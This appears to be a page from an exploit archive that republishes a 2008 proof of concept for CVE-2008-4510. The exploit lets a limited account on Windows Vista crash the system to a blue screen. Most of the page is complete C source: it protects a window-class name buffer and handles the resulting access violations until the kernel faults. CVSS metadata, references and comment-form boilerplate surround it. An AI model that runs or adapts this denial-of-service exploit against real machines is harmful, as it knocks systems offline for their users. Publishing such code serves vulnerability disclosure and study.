MS Windows Vista Access Violation from Limited Account Exploit (BSoD)

2008.10.10

Credit: Defsanguje

Risk: Low

Local: Yes

Remote: No

CVE: CVE-2008-4510

CWE: CWE-399

CVSS Base Score: 4.9/10

Impact Subscore: 6.9/10

Exploitability Subscore: 3.9/10

Exploit range: Local

Attack complexity: Low

Authentication: No required

Confidentiality impact: None

Integrity impact: None

Availability impact: Complete

// //////////////////////////////////////////////////////////////
// Windows Vista BSoD (Access violation) from limited account. //
// Tested on Home Premium & Ultimate @ October 05 2008 //
/////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <windows.h>
WCHAR szClass[] = L"BSODClass";
int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo);
typedef void (WINAPI* pFunc)(ULONG ulFirst, LPVOID lpHandler);
pFunc pRtlAddVectoredExceptionHandler;
typedef struct
{
DWORD dwWriteViolation;
LPVOID lpAddress;
} EXCEPTION_ACCESS_VIOLATION_PARAMS;
int main()
{
WNDCLASSW wc;
DWORD dwOldProt;
printf("Windows Vista BSoD from usermode/limited account.\n"
"Coded by. Defsanguje - October 05 2008\n");
// Setup vectored exception handler. SEH would work also.
pRtlAddVectoredExceptionHandler = (pFunc)GetProcAddress((HMODULE)GetModuleHandle("ntdll.dll"),
"RtlAddVectoredExceptionHandler");
(*pRtlAddVectoredExceptionHandler)(TRUE, ExceptionHandler);
// Dummy data
wc.style = 0;
wc.lpfnWndProc = NULL;
wc.cbClsExtra = 0;
wc.cbWndExtra = 0;
wc.hInstance = GetModuleHandle(NULL);
wc.hIcon = NULL;
wc.hCursor = LoadCursor(NULL, IDC_ARROW);
wc.hbrBackground = GetStockObject(HOLLOW_BRUSH);
wc.lpszMenuName = NULL;
wc.lpszClassName = szClass;
VirtualProtect(szClass, 1, PAGE_NOACCESS, &dwOldProt);
RegisterClassW(&wc);
printf("You shouldn't see this");
return 0;
}
int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo)
{
static LPVOID lpLastAddress;
static DWORD dwOldProt;
EXCEPTION_ACCESS_VIOLATION_PARAMS* avParams;
switch(lpExceptionInfo->ExceptionRecord->ExceptionCode)
{
case EXCEPTION_ACCESS_VIOLATION:
avParams = (EXCEPTION_ACCESS_VIOLATION_PARAMS*)lpExceptionInfo->ExceptionRecord->ExceptionInformation;
VirtualProtect(avParams->lpAddress, 1, PAGE_READWRITE, &dwOldProt);
lpLastAddress = avParams->lpAddress;
// Set trap flag
lpExceptionInfo->ContextRecord->EFlags |= 0x100;
break;
case STATUS_SINGLE_STEP:
VirtualProtect(lpLastAddress, 1, PAGE_NOACCESS, &dwOldProt);
break;
default:
break;
}
return EXCEPTION_CONTINUE_EXECUTION;
;
}

References:

http://www.securityfocus.com/bid/31570

http://www.milw0rm.com/exploits/6671

http://secunia.com/advisories/32115

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

MS Windows Vista Access Violation from Limited Account Exploit (BSoD)

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.